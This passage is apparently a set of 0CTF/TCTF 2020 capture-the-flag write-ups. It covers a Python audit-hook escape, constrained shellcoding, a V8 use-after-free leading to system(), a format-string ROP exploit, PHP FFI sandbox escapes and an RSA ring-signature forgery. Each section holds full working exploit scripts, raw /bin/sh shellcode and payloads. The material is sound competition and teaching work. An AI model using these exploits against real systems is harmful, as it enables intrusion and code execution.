which basically restricts us from executing commands on the shell or reading files.
The only possible events left are:
array.__new__, builtins.input, builtins.input/result, code.__new__, compile, cpython.PyInterpreterState_Clear, cpython.PyInterpreterState_New, cpython._PySys_ClearAuditHooks, cpython.run_command, cpython.run_file, cpython.run_interactivehook, cpython.run_module, cpython.run_startup, cpython.run_stdin, ensurepip.bootstrap, exec, pickle.find_class, signal.pthread_kill, sys._current_frames, sys._getframe, sys.addaudithook, sys.excepthook, sys.set_asyncgen_hooks_finalizer, sys.set_asyncgen_hooks_firstiter, sys.setprofile, sys.settrace, sys.unraisablehook
Since we can still use exec
we are able to execute Python code or bytecode.
We were able to gain some information:
().__class__.__base__.__subclasses__()[183]()._module.__builtins__["exec"]('builtins=().__class__.__base__.__subclasses__()[183]()._module.__builtins__;print=builtins["print"];sys=builtins["__import__"]("sys");print(sys.version);')
3.8.3 (default, Jun 9 2020, 17:39:39)
[GCC 8.3.0]
However, the audit-sandbox still prevented us from interacting with the machine in any meaningful way, and we could not figure out how to read the flag without further shenanigans. It was therefore time to have a look at the CPython source code, to figure out how the audit-hook was implemented exactly.
After scanning through the code, it became evident that the function responsible for blocking all our escape-attempts was PySys_Audit, and it looked like there was no way to prevent the once-installed AuditHookEntry
from being executed.
Well, there was almost no way: There was the conveniently named function PySys_ClearAuditHooks – which was inconveniently inaccesible directly from Python.
But after looking at how that function was used, an idea began to form:
Clearing the audit hooks is not the last operation in the shutdown-sequence of the interpreter. Instead, it is directly followed by a call to PyImport_Cleanup
, helpfully annotated with the comment “Destroy all modules”…
So you’re saying module destructors are called after the audit hooks have been cleared?
builtins = "().__class__.__base__.__subclasses__()[183]()._module.__builtins__"
code = f"""
b = {builtins}
sys = b["__import__"]("sys")
os = b["__import__"]("os")
class evil_del:
def __del__(self):
os.system("/readflag")
sys.modules["derp"] = evil_del()
exit()
"""
hexed = "".join([f"\\x{ord(b):02x}" for b in code])
wrapped = f'{builtins}["exec"]("{hexed}")'
print(wrapped)
flag{bytecode_exploit_to_pwn_python_and_bypass_audit_hook_36c3879ea297210820301ce1}
We are presented with a shellcoding challenge where we can provide a payload and part of it gets overwritten. The beginning and the last two bytes of the payload remaing intact. This allows one to control the first two bytes of the executed code, after which the program’s code prints some data and executes RET
. At the point of executing the two bytes, the R11
register contains the address of the mapped executable page. The first 0x100 bytes of that page contain the beginning of our payload. Gaining execution can be done via: push r11 = 41 53
. After RET
is performed, our payload gets immediately executed.
The only limitation is that the payload has to be in the unicode format: 00-00 00-0F 00-FF 00-FF. The idea behind my solution is to use a one gadget in libc to open a shell. Since, an address to __libc_start_main
is on the stack, the payload could pop sufficiently many times, recompute the offset and jump to the address. Due to the limitation caused by the payload constraints, this solution has to guess the nibble after the page offset.
Short version of the payload:
## Multiple of these to position the stack until __libc_start_main
pop rax = 58
rex.WB or al,0x0 = 49 0c 00
## Now RAX contains the address of __libc_start_main + some offset.
We want to reposition the address to the one gadget and jump into it:
add rax,0xe0000 = 48 05 00 00 0e 00
add al, 0x0 = 04 00 ; padding
mov ah, 0xe3 = b4 e3
add al, 0x0 = 04 00 ; padding
mov al, 0x8c = b0 8c
add al, 0x0 = 04 00 ; padding
jmp rax = ff e0
... = 00 00 ; padding
Code:
from pwn import *
io = remote("pwnable.org", 31322)
# Create mapping
io.send("\U0001f37a" * 3)
# Send payload
io.send("\U0001f434" * 3)
io.send("\U000c4958" * 9 + "\U00000548" + "\U0004000e" + "\U0004e3b4" + "\U00048cb0" + "\U0000e0ff" + "\U00010000" * (0x81 - 10 - 5) + "\U00015341" + "\n")
io.interactive()
The script doesn’t consider that guessing the one gadget address can fail and requires manual work to restart it.
The flag is: flag{zer0_address_is_so0o0o0o_dangerous}
We are presented with a shellcoding challenge where the payload, environment and time are constrained. Three options are presented in each round:
mmap
a random page between [0, 0x1000000]
(valid range begins at 0x10000 due to mmap_min_addr).fgetws
and print it in a very limited constrained environment:
registers are scrubbed, a corrupted stack frame of 0x8000
is allocated, validation is performed when restoring the context.
Only RDX, RIP, RSP have something pointing to a valid address.Option 1 allows one to fill the [0x10000, 0x1000000]
region with pages and 2 allows one to fill them with our payload.
Option 2 has a bug where we can execute a 2-byte-long instruction before the print happens.
The first idea of my solution is to corrupt the stack pointer by executing and esp, edx = 21 d4
. Due to the ESP having mostly all bits set after the page offset, we are very likely to get an address which points to the current page where the payload is. This would also zero-out all bits after the 32-th bit. However, 0x8000
is later added to the stack pointer and there is validation of it.
The second idea is to use option 1 to populate the address space until we find that a mapping already exists 0x8000
bytes ahead of the current one. For each mapping before the last one, we send a payload with the register values we want to be popped, the saved stack pointer and useful payload. Once the registers are popped, RET is executed and we gain execution. The two bytes executed in those mappings are two nops to avoid crashes.
However, the payload is limited to be in the Unicode format [00-00] [00-0F] [00-FF] [00-FF]. The solution is to filter the pages in the first idea to only be of suitable addresses which match the unicode pattern. Then we can always point the popped registers to addresses which are mapped. We also only need to be able to execute the read syscall
and provide the actual payload to open a shell.
The initial payload is thus:
xor eax, eax = 31 c0
add al, 0x0 = 04 00 ; padding
syscall = 0f 05
add al, 0x0 = 04 00 ; padding
jmp -106 = eb 90
.data 00 00 = 00 00 ; padding
The payload would allow me to read any bytes into the current buffer and then immediately jump backwards to execute it. The second payload I send is a standard shell payload copied from exploit-db.
During the development phase I found it useful to edit the provided binary to only focus on corrupting the stack and the constrained shellcoding. The mmap address was made fixed and the addition of 0x8000 bytes was removed. This made experimentation easy.
The set alarm made it difficult to brute-force remotely since I could get around one mmap per second.
Code:
from pwn import *
import codecs
def prep_payload(attack, hh):
# hh =e0
#time.sleep(1)
io.readuntil(u"Miaow miaow miaow")
io.send("\U0001f434" * 3)
payload = ""
payload += "\U00000001" * 16 # r15-r8
payload += "\U00000002" * 2 # rbp
value = '\\U' + str("000" + hh + "000")
value = codecs.decode(value, "unicode_escape")
payload += value + "\U00000000" # rsi, address to read at
payload += "\U00000000" + "\U00000000" # rdi, fd = stdin
payload += "\U00000200" + "\U00000000" # rdx, length
payload += "\U00014090" + "\U00000000" # rcx
payload += "\U00015090" + "\U00000000" # rbx
payload += "\U0000003b" + "\U00000000" # rax
payload += "\U00000000"*2 # eflags
value = '\\U' + str("000" + hh + "088")
value = codecs.decode(value, "unicode_escape")
payload += value + "\U00000000" # rsp
value = '\\U' + str("000" + hh + "090")
value = codecs.decode(value, "unicode_escape")
payload += value + "\U00000000"
# zero rax, syscall, relative jump
payload += "\U0004c031" + "\U0004050f" + "\U000090eb"
if (attack == True):
# corrupt stack
payload += "\U0000d421" * (0x82 - 18 * 2 - 1 - (3))
else:
# send nops
payload += "\U00009090" * (0x82 - 18 * 2 - 1 - (3))
#time.sleep(1)
io.send(payload)
attack_cnt = 0
attempts = 0
while True:
io = remote("pwnable.org", 31323)
print(str(attempts) + " " + str(attack_cnt))
attempts += 1
addresses = []
# Try to find two allocations which are 0x8000 apart.
try:
while True:
#time.sleep(1)
io.readuntil(u"Miaow miaow miaow")
io.send("\U0001f37a" * 3)
io.readuntil("mmap() at @")
addr = int(io.readuntil("\n")[:-1], 16)
# we want it to be of the format 0xYY000
if ((addr >> 12) <= 0xff):
addresses.append(addr)
special = (addr >> 12) & 0xFF
print(f"Ok: {hex(addr)}, special: {hex(special)}")
if (addr + 0x8000) in addresses:
prep_payload(True, hex(addr >> 12)[2:])
print("Attack")
attack_cnt += 1
break
else:
prep_payload(False, hex(addr >> 12)[2:])
except:
continue
io.readuntil(b"\x00\x00\x00\x01"*8)
io.send(0x2a * b"\x00" + b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05") # send /bin/sh payload
try:
io.send("ls\n")
io.send("cat flag\n")
except:
continue
io.interactive()
Unfortunately, the script requires manual restart by clicking enter but few attempts are necessary.
Flag is: flag{thanks_Plaid_CTF_we_found_th1s}
For this task, we are given a modified copy of d8
(the command line JavaScript intepreter for the V8 engine).
The applied patch is fairly straightforward: Native syntax (that allows interfacing with V8 internals) is disabled except for %ArrayBufferDetach(...)
and globals and imports are removed. The interesting part are the changes to typed-array-set.tq
, which remove an important check in TypedArray.prototype.set
:
Each JavaScript TypedArray
is backed by an ArrayBuffer
. If you create a TypedArray
(such as Uint8Array
) directly, such a buffer object is implicitly created for you. This ArrayBuffer
can become detached (i.e. it is no longer backed by memory, and has an implicit byte length of zero). Normally, it is prohibited to use .set
to copy into or from a TypedArray
with a detached buffer (throwing a TypeError
in the process as specified here), but this check is removed by the patch.
This gives us a straightforward use-after-free on the ArrayBuffer (and the %ArrayBufferDetach
primitive allows us to forcibly free any targeted ArrayBuffer
).
Note that V8 (or at least d8
) allocates the JavaScript objects on their own heap (i.e. the JSArrayBuffer
and JSTypedArray
objects), but the underlying buffers are still allocated normally using malloc
and calloc
.
When we create an ArrayBuffer
, we can observe four separate allocations on the normal libc heap (e.g. with traceheap via LD_PRELOAD
):
calloc(<size>, 1)
for the underlying data buffermalloc(48)
for the v8::internal::BackingStore
that takes care of deallocationmalloc(32)
for the control block of the std::shared_ptr
that contains the BackingStore
malloc(40)
for the ArrayBufferExtension
that is used internally to track heap objects.When we detach an array buffer, the first three of these objects are freed (I believe that the extension block is freed whenever garbage collection runs, but did not verify this).
At first, I thought that it may be necessary to overwrite the data pointer in the BackingStore
to obtain arbitrary write access via a manipulated ArrayBuffer
, but it turns out that this is both unnecessary and impossible — the JSArrayBuffer
does not actually reference the BackingStore
object! Instead, its backing_store_
member is just a pointer to the actual data buffer (despite the name). However, the v8::internal::BackingStore
class allows for a number of different allocators, and has support for storing a function pointer to a deallocation routine. If we can overwrite this function pointer, we can call any function with the data in the ArrayBuffer
as its first argument.
This turns the challenge into a relatively straightforward heap exploit on glibc 2.27:
First, we create a 48 byte ArrayBuffer
(with an associated TypedArray
) and detach the buffer. This places two 48-byte blocks in the proper tcache bin, the first of which is still accessible to us through the TypedArray
thanks to the patches.
We discard the first of these blocks by allocating another ArrayBuffer
(the storage used for the BackingStore
of the first buffer is reused here). A third (large) ArrayBuffer
is allocated — and the allocation of its BackingStore
will overlap the UaF created by detaching the first buffer.
// Create 48-byte buffer that we later overlap with a BackingStore
const backingStore = new ArrayBuffer(48);
const backingStore_u8 = new Uint8Array(backingStore);
%ArrayBufferDetach(backingStore);
// Pad allocations so that we align the following allocation nicely.
const discard = new ArrayBuffer(32);
// Allocate an ArrayBuffer whose BackingStore overlaps the 48-byte
// data buffer of the backingStore (by tcache logic)
const overlapping = new ArrayBuffer(0x1000);
const overlapping_u8 = new Uint8Array(overlapping);
Since we can’t just read from the TypedArray
(the checks for detached buffers are only disabled for the set
method), we need to create an additional TypedArray
that we can use to copy data from detached buffers. Here’s how the BackingStore
looks like internally:
function hex64(v) { return '0x' + v.toString(16).padStart(16, '0'); }
function hex8(v) { return '0x' + v.toString(16).padStart(2, '0'); }
const reader = new ArrayBuffer(0x1000);
const u8 = new Uint8Array(reader);
const u64 = new BigUint64Array(reader);
u8.set(backingStore_u8);
console.log('backingStore array / BackingStore of overlapping array');
console.log('\t 0 buffer_start_ =', hex64(u64[0]));
console.log('\t 8 byte_length_ =', hex64(u64[1]));
console.log('\t16 byte_capacity_ =', hex64(u64[2]));
console.log('\t24 type_specific_data_ =', hex64(u64[3]));
console.log('\t32 ', hex64(u64[4]));
console.log('\t40 [flags] =', hex64(u64[5]));
To leak a libc address, we do the usual trick of creating a read-after-free on a largebin chunk, which will give us a pointer to somewhere near the main_arena
in the libc.
// Allocate large-bin chunks so that we find the libc that way.
const large_1 = new ArrayBuffer(0x440);
const large_2 = new ArrayBuffer(0x440);
const large_1_u8 = new Uint8Array(large_1);
const large_2_u8 = new Uint8Array(large_2);
%ArrayBufferDetach(large_1);
%ArrayBufferDetach(large_2);
u8.set(large_2_u8);
let libc_main_arena_ptr = u64[1];
// Ubuntu 18.04 glibc 2.27
LIBC_MAIN_ARENA_PTR_OFFSET = BigInt(0x3ebca0)
LIBC_SYSTEM_OFFSET = BigInt(0x4f440)
let libc_start = libc_main_arena_ptr - BigInt(LIBC_MAIN_ARENA_PTR_OFFSET);
let libc_system = libc_start + BigInt(LIBC_SYSTEM_OFFSET);
For command execution, we overwrite the type_specific_data_
member of the v8::internal::BackingStore
with the address of system
and set the appropriate flags. If the custom_deleter_
flag is set in the BackingStore
, the type_specific_data_
member is interpreted as a v8::internal::BackingStore::DeleterInfo
, which consists of a function pointer (callback
) and an additional data pointer (data
).
When the BackingStore
is destroyed, the deleter callback will be invoked as callback(buffer_start_, buffer_size_, data)
. Of course, we control the contents of buffer_start_
(it is just the contents of the ArrayBuffer
associated with that BackingStore
), and so we just need to destroy the BackingStore
to call system("/readflag")
.
Of course, the BackingStore
is destroyed as soon as we detach the buffer that uses it, which gives us a really convenient way to trigger RCE.
const COMMAND = '/readflag';
const backingStoreWriter = new ArrayBuffer(48);
const backingStoreWriter_u8 = new Uint8Array(backingStoreWriter);
const backingStoreWriter_u64 = new BigUint64Array(backingStoreWriter);
backingStoreWriter_u8.set(backingStore_u8);
backingStoreWriter_u64[3] = libc_system;
backingStoreWriter_u64[5] |= BigInt(0x40); // Set the flag for the destructor.
backingStore_u8.set(backingStoreWriter_u8);
overlapping_u8.set(Uint8Array.from(COMMAND.split('').map(c => c.charCodeAt(0))));
%ArrayBufferDetach(overlapping); // Forcibly free the BackingStore.
Here is the full exploit:
// We can use detached ArrayBuffers in TypedArray.prototype.set (both for
// reading and for writing), and we can forcibly detach an array buffer using
// %DetachArrayBuffer (this calls ->Detach(false) on the underlying
// JSArrayBuffer object).
// Global symbols and imports are removed.
function hex64(v) { return '0x' + v.toString(16).padStart(16, '0'); }
function hex8(v) { return '0x' + v.toString(16).padStart(2, '0'); }
// Ubuntu 18.04 glibc 2.27
LIBC_MAIN_ARENA_PTR_OFFSET = BigInt(0x3ebca0)
LIBC_SYSTEM_OFFSET = BigInt(0x4f440)
COMMAND = '/readflag'
// Make a 48-byte allocation to overlap the extension in which the BackingStore is registered
// Each array buffer allocation performs the following allocations:
// calloc(<size>, 1);
// malloc(48); // for the v8::internal::BackingStore
// malloc(32); // for the control block of the std::shared_ptr containing the backing store
// malloc(40); // for the ArrayBufferExtension (enabled by default in the build we have)
// Create 48-byte buffer that we later overlap with a BackingStore
const backingStore = new ArrayBuffer(48);
const backingStore_u8 = new Uint8Array(backingStore);
%ArrayBufferDetach(backingStore);
// Pad allocations so that we align the following allocation nicely.
const discard = new ArrayBuffer(32);
// Allocate an ArrayBuffer whose BackingStore overlaps the 48-byte data buffer of the backingStore (by tcache logic)
const overlapping = new ArrayBuffer(0x1000);
const overlapping_u8 = new Uint8Array(overlapping);
// Clone the BackingStore into a new array
const reader = new ArrayBuffer(0x1000);
const u8 = new Uint8Array(reader);
const u64 = new BigUint64Array(reader);
u8.set(backingStore_u8);
console.log('backingStore array / BackingStore of overlapping array');
console.log('\t 0 buffer_start_ =', hex64(u64[0]));
console.log('\t 8 byte_length_ =', hex64(u64[1]));
console.log('\t16 byte_capacity_ =', hex64(u64[2]));
console.log('\t24 type_specific_data_ =', hex64(u64[3]));
console.log('\t32 ', hex64(u64[4]));
console.log('\t40 [flags] =', hex64(u64[5]));
// If (flags & 0x40), type_specific_data_ is a pair of a function pointer and
// destructor data; the function pointer is invoked on destruction as
// fn(buffer_start_, byte_length_, data).
// Allocate large-bin chunks so that we find the libc that way.
const large_1 = new ArrayBuffer(0x440);
const large_2 = new ArrayBuffer(0x440);
const large_1_u8 = new Uint8Array(large_1);
const large_2_u8 = new Uint8Array(large_2);
%ArrayBufferDetach(large_1);
%ArrayBufferDetach(large_2);
u8.set(large_2_u8);
let libc_main_arena_ptr = u64[1];
let libc_start = libc_main_arena_ptr - BigInt(LIBC_MAIN_ARENA_PTR_OFFSET);
let libc_system = libc_start + BigInt(LIBC_SYSTEM_OFFSET);
console.log('Leaked pointer to (near) main_arena:', hex64(libc_main_arena_ptr));
console.log('Calculated location of libc.so.6: ', hex64(libc_start));
console.log('Calculated location of system(): ', hex64(libc_system));
// The array we copy from must not be larger than the array we copy into, and
// set has no way to restrict the range we copy from.
const backingStoreWriter = new ArrayBuffer(48);
const backingStoreWriter_u8 = new Uint8Array(backingStoreWriter);
const backingStoreWriter_u64 = new BigUint64Array(backingStoreWriter);
backingStoreWriter_u8.set(backingStore_u8);
backingStoreWriter_u64[3] = libc_system;
backingStoreWriter_u64[5] |= BigInt(0x40); // Set the flag for the destructor.
backingStore_u8.set(backingStoreWriter_u8);
overlapping_u8.set(Uint8Array.from(COMMAND.split('').map(c => c.charCodeAt(0))));
%ArrayBufferDetach(overlapping); // Forcibly free the BackingStore.
and an example output
_______________ _____ ________ ___________________
__ ____/___ /_ ______________ _______ ___ ___(_)____ _________ ___ ___ __ \__ ____/___ ____/
_ / __ __ \__ ___/_ __ \__ __ `__ \__ / _ / / /__ __ `__ \ __ /_/ /_ / __ __/
/ /___ _ / / /_ / / /_/ /_ / / / / /_ / / /_/ / _ / / / / / _ _, _/ / /___ _ /___
\____/ /_/ /_/ /_/ \____/ /_/ /_/ /_/ /_/ \__,_/ /_/ /_/ /_/ /_/ |_| \____/ /_____/
Welcome to 0CTF/TCTF 2020!
Paste your javascript code here, end it with EOF(not Ctrl-D :P). Then I will run `d8 <xxx.js>`.
flag{dbc68439ba5f2cdbccf459cd3edb54c80b9c89e9}
backingStore array / BackingStore of overlapping array
0 buffer_start_ = 0x00005624615f8ad0
8 byte_length_ = 0x0000000000001000
16 byte_capacity_ = 0x0000000000001000
24 type_specific_data_ = 0x00007ffdd2bfe780
32 0x0000000000000000
40 [flags] = 0x0000000000000008
Leaked pointer to (near) main_arena: 0x00007fdc28d77ca0
Calculated location of libc.so.6: 0x00007fdc2898c000
Calculated location of system(): 0x00007fdc289db440
This is a fairly simple-looking task that first requests your name and your phone number. Then it reads input line by line and echoes it back.
Looking at the binary, you will quickly identify the vulnerability. After reading your name, before starting the read-echo loop, name and phone number are written to stderr
in a very interesting manner.
void print_audit(struct player*){
snprintf(buf, 0x100, "[USER] name: %s;phone: %lld\n", player->name, player->phone);
fprintf(stderr, buf);
}
While the first invocation of printf writes a user-supplied string into the buffer via %s
, the second does not. And since we control the contents of player->name
we subsequently control buf
.
Here we can inject format string specifiers. The main difficulty comes from using global variables to hold the player name and the buffer. As only input from reading the phone number lies on the stack, we cannot inject pointer arguments.
To make life easier I modified the binary in two ways. First I removed the annoying sleep(1)
from the initialization and secondly I patched the fprintf
to print to stdout
instead of stderr
. The latter modification allowed me to apply my tooling to automatically find pointer chains on the stack. From the libc version bundled with the task, I guessed the environment to be an Ubuntu bionic. Thus I created a docker image deploying the task and verified my assumption. In addition to applying my tool, I dumped the stack at the time of the second printf
to get a more complete picture:
0x7ffc5eda6760: 0x0000000000000000 0x000055d889b5a160 <fmt>
0x7ffc5eda6770: 0x00007ffc5eda6890 <1b> 0x000055d889b57443 <ret>
0x7ffc5eda6780: 0x0000000000000000 0x0000000000000000
0x7ffc5eda6790: 0x00007ffc5eda6890 <2b> 0x00007fcb70e0ca00
0x7ffc5eda67a0: 0x0000000000000d68 0x00007fcb70aae148
0x7ffc5eda67b0: 0x000000007005ca00 0xffffffffffffffff
0x7ffc5eda67c0: 0x000055d889b570f0 0x000000000000000a
0x7ffc5eda67d0: 0x00007ffc5eda6870 <3b> 0x000055d889b570f0
0x7ffc5eda67e0: 0x00007ffc5eda6990 0x0000000000000000
0x7ffc5eda67f0: 0x0000000000000000 0x000055d889b57348
0x7ffc5eda6800: 0x00007fcb70e0ca00 <libc> 0x00007ffc5eda6814
0x7ffc5eda6810: 0x0000000034333231 0x00007ffc5eda6990
0x7ffc5eda6820: 0x0000000000000000 0x00007fcb70aaf3f2
0x7ffc5eda6830: 0x0000000000000036 0x000055d889b5a166
0x7ffc5eda6840: 0x00007ffc5eda6870 <5b> 0x000055d889b5728d
0x7ffc5eda6850: 0x0000010089b58029 0x6fb335d337bed900
0x7ffc5eda6860: 0x0000000000000000 0x0000000000000000
0x7ffc5eda6870: 0x00007ffc5eda6890 <5t> 0x000055d889b573b3
0x7ffc5eda6880: 0x00007ffc5eda6990 0x6fb335d337bed900
0x7ffc5eda6890: 0x00007ffc5eda68b0 <1t,2t,3b> 0x000055d889b574d0 <ret to main>
0x7ffc5eda68a0: 0x00007ffc5eda6990 0x0000000000000000
0x7ffc5eda68b0: 0x000055d889b574e0 <3t> 0x00007fcb70a42b97 <ret to libc>
The pointer chains my tool recovered were [(7, 43), (11, 43), (19, 39), (33, 39), (39, 43), (43, 47), (50, 76)]
.
I marked these chains in the stack dump. I could have done this by hand as well, but this tool also recovers the indexes as used by printf
which otherwise would be a tedious task. Immediately the chain 3b -> 3t
came to my attention, as it points into the executable’s image. The pointer to stderr
and stdout
are stored in the writeable data segment on the very next page of memory. A plan quickly formed in my head. The goal was to overwrite the stderr
pointer to point to stdout
and also overwrite the return address, returning into main()
, to call reading the name and doing the format-string attack again. For getting the loop, three chains caught my attention. Chains 1, 2 and 5 both looked promising. Unfortunately using chains 1 or 2 would entail breaking chain 3, which I relied on. Thus I used chain 5. It was possible to fix the return address with a one byte partial overwrite the change the pointer on the stack, as well as one to overwrite the return address. Because of stack randomization this requires 4 bits of brute force. For changing stderr
to stdout
two overwrites with two bytes each were required, adding 4 bits of brute force each. Thus the exploit already has a success probability of only 1 in 212. This is good enough but there is not much room for more.
I canceled the echoing part using "~."
and with a bit of luck was greeted with the name prompt again. With a little more luck, I received the output of fprintf
. To my delight, I could confirm that the pointer chains were still intact in the second round. After some consideration I decided to first leak the libc address and then write a small ROP chain instead of the return from main()
. This time I could use chain 1 as I did not need to overwrite anything in the program image any more. Writing two bytes at a time I created the standard pop rdi; "/bin/sh\0"; system
ROP chain. Running this exploit against remote I got a little lucky and only had to wait ~30 seconds.
We are presented with a minimal PHP sandbox challenge:
<?php
if (isset($_GET['rh'])) {
eval($_GET['rh']);
} else {
show_source(__FILE__);
}
The following functions are disabled:
set_time_limit,ini_set,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail,putenv,error_log,dl
…and open_basedir
is set to /var/www/html
.
This PHP bug can be used to get a file listing of /
:
foreach(new DirectoryIterator('glob:///*') as $f){
echo $f."\n";
}
Output:
bin
dev
etc
flag.h
flag.so
home
lib
media
mnt
opt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var
The files flag.h
and flag.so
and an enabled FFI extension hint towards trying to call something.
We can’t directly read flag.h
because of the open_basedir
, but we can load it:
$ffi = FFI::load('/flag.h');
But we are still lacking the name of the function that we should call to get the flag.
Dramaturgical break
At this point someone else likely pwned the challenge via the open fpm
socket and disabled the open_basedir
restriction for future requests.
We could thus simply read /flag.h
and call flag_fUn3t1on_fFi()
.
(According to https://ctftime.org/writeup/21979, it seems that we were not the only one to use this problem.)
#!/usr/bin/env python3
import requests
payload = '''
error_reporting(E_ALL);
ini_set('error_reporting', E_ALL);
ini_set('display_errors', '1');
foreach(new DirectoryIterator('glob:///*') as $f){
echo $f."\n";
}
$ffi = FFI::load('/flag.h');
$a = $ffi->flag_fUn3t1on_fFi();
var_dump(FFI::string($a));
'''
host = 'pwnable.org'
r = requests.get(f'http://{host}:19260/', params={'rh': payload})
print(r.text, r.status_code)
Flag: flag{FFi_1s_qu1T3_DANg1ouS}
We are again presented with a minimal PHP sandbox challenge:
<?php
if (isset($_GET['rh'])) {
eval($_GET['rh']);
} else {
show_source(__FILE__);
}
The challenge was very similar to the easyphp challenge, but this time PHP was running within Apache
+ mod_php
.
We again need to call a secret function to get the flag from /flag.so
.
From inspecting php-src
we know that /flag.h
gets fully read into memory when being loaded, so we decided to leak this information via the FFI extension.
#!/usr/bin/env python3
import requests
flag after a leak
payload = '''
error_reporting(E_ALL);
ini_set('error_reporting', E_ALL);
ini_set('display_errors', '1');
for($i=0;$i<1000;$i++){
$f = FFI::load ('/flag.h');
}
$a = FFI::new ('uint8_t[256]', true, false);
$a = FFI::cast ('uint8_t *', $a);
$n = 1024*512;
for($i=0;$i<$n+(1024*1024);$i++){
echo chr($a[(-$n)+$i]);;
}
'''
host = 'pwnable.org'
r = requests.get(f'http://{host}:19261/', params={
'rh': payload
})
print(r.text, r.status_code)
After playing with the parameters (especially the allocation settings of $a
) we were able to reliable leak the the function name from memory:
$. /leak.py | strings |grep flag
; Boolean flags can be turned on using the values 1, On, True or Yes.
; unix or win32 systems, setting this flag will cause PHP to
; http://php.net/filter.default-flags
;filter.default_flags =
; SQLite defensive mode flag (only available from SQLite 3.26+)
; When the defensive flag is enabled, language features that allow ordinary
; (for older SQLite versions, this flag has no use)
; Whether or not to add the httpOnly flag to the cookie, which makes it
ffi.preload=/flag.h
flag_wAt3_uP_apA3H1
flag_wAt3_uP_apA3H1
$f = FFI::load ('/flag.h');
$f = FFI::load ('/flag.h');
$f = FFI::load ('/flag.h');
$f = FFI::load ('/flag.h');
$f = FFI::load ('/flag.h');
/flag.h
/flag.h
COPE "flag
COPE "flag
COPE "flag
#!/usr/bin/env python3
import requests
payload = '''
$ffi = FFI::load('/flag.h');
var_dump(FFI::string($ffi->flag_wAt3_uP_apA3H1()));
'''
host = 'pwnable.org'
r = requests.get(f'http://{host}:19261/', params={'rh': payload})
print(r.text, r.status_code)
Flag: flag{YoU_C3nT_u3iNg_FPm_n0w}
This task consisted of an RSA ring signature with a linear E
function:
self.request.sendall("message: ")
msg = self.request.recv(0x40).strip()
ys = []
for i in range(K):
self.request.sendall("x%d: " % i)
x = int(self.request.recv(0x40).strip())
ys.append(pow(x,e,Ns[i]))
self.request.sendall("v: ")
v = int(self.request.recv(0x40).strip())
key = sha256(msg).digest()[:16]
E = ARC4.new(key)
cur = v
for i in range(K):
pt = (ys[i]^cur)%(1<<64)
ct = unpack('Q', E.encrypt(pack('Q',pt)))[0]
cur = ct
if cur == v:
self.request.sendall("%s\n" % flag)
The thing to note here is that the RC4 encryptions are just XORs with constants that depend on the message only. Thus, we can phrase the problem as follows:
Find values $x_0,…,x_{63}$ such that \[ \bigoplus_{i=0}^{63} \big((x_i^e\bmod N_i)\bmod 2^{64}\big) = \bigoplus_{i=0}^{63} \mathrm{RC4}_{\mathit{key}}(00…0) \,\text. \]
Since the key
is just a hash of the message, we can consider the right-hand side to be a constant; let’s call it target
. Now this problem is an instance of the $k$-XOR problem (here $k=64$) with respect to the functions $f_i\colon x\mapsto (x^e\bmod N_i)\bmod 2^{64}$.
We applied Wagner’s algorithm to solve it:
Here’s a straightforward sage
implementation (in hindsight, pure Python would’ve been enough):
#!/usr/bin/env sage
import socket, re, string, itertools, hashlib
e, Ns = # from task.py...
from hashlib import sha256
from struct import pack, unpack
from Crypto.Cipher import ARC4
msg = b'hxp says hi <3'
key = sha256(msg).digest()[:16]
E = ARC4.new(key)
target = 0
for i in range(64):
target ^^= unpack('Q', E.encrypt(pack('Q',0)))[0]
print(f'target: {target}')
size = 64
step = 11
num = 2**step
xss, yss = [], []
for i,N in enumerate(Ns):
xss.append([])
yss.append([])
while len(xss[-1]) < num:
x = randrange(10**30)
y = ZZ(pow(x,e,N))
xss[-1].append(x)
yss[-1].append(y)
for i in range(num):
yss[0][i] ^^= target #XXX
lists = [[(y % 2**size, [i]) for i,y in enumerate(ys)] for ys in yss]
for bits in range(step,size+step,step):
if bits > size: bits = size
print(f'{bits:3}:', ' '.join(f'{len(vs):3}' for vs in lists))
new_lists = []
for i in range(0,len(lists),2):
vs, ws = lists[i:i+2]
tab = dict()
for v,jv in vs:
if v % 2**bits not in tab:
tab[v % 2**bits] = []
tab[v % 2**bits].append((v,jv))
us = []
for w,jw in ws:
if w % 2**bits in tab:
for v,jv in tab[w % 2**bits]:
us.append((v^^w, jv+jw))
new_lists.append(us)
lists = new_lists
vs, = lists
js = choice(vs)[-1]
########################################
sock = socket.socket()
sock.connect(('pwnable.org', 10001))
if 1:
s = b'';
while b'Give me XXX' not in s:
tmp = sock.recv(0x100); assert tmp; s += tmp
m = re.search(r'XXXX.([^)]+)\) == ([0-9a-f]+)', s.decode())
suffix, d = m.groups()
alph = string.ascii_letters + string.digits
for s in map(''.join, itertools.product(*(alph for _ in range(4)))):
if hashlib.sha256((s + suffix).encode()).hexdigest() == d:
sock.sendall(s.encode() + b'\n')
break
else:
assert False
print('PoW done')
print(sock.recv(0x100))
print(repr(msg.decode()))
sock.sendall(f'{msg.decode()}\n'.encode())
for j,xs in zip(js,xss):
print(sock.recv(0x100))
print(xs[j])
sock.sendall(f'{xs[j]}\n'.encode())
print(sock.recv(0x100))
sock.sendall(b'1337\n')
import telnetlib
tel = telnetlib.Telnet()
tel.sock = sock
tel.interact()
This script takes something like a minute to obtain the flag:
$ ./pwn.sage
target: 8276634191980152343
11: 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048 2048
